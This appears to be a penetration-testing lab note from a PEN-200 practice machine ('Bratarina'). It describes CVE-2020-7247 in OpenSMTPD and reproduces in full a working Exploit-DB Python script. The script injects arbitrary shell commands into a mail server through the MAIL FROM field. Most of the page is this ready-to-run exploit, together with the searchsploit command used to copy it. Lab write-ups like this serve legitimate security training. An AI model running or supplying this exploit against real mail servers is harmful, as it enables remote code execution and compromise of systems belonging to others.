CVE-2020-7247
/Practice/Bratarina/3-Exploitation/attachments/{22E79ED9-2974-41C6-8381-818D25152D71}.png)
A vulnerability, which was classified as very critical, was found in OpenSMTPD 6.6. This affects some unknown processing of the file smtp_session.c of the component SMTP Session Handler. The manipulation of the argument MAIL FROM as part of a Shell Metacharacter leads to a return value vulnerability. CWE is classifying the issue as CWE-252. The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions. This is going to have an impact on confidentiality, integrity, and availability.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ searchsploit -m linux/remote/47984.py ; mv 47984.py CVE-2020-7247.py
Exploit: OpenSMTPD 6.6.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47984
Path: /usr/share/exploitdb/exploits/linux/remote/47984.py
Codes: CVE-2020-7247
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/PEN-200/PG_PRACTICE/47984.pyExploit locally available
# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]
s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))
res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
print('[!] No OpenSMTPD detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')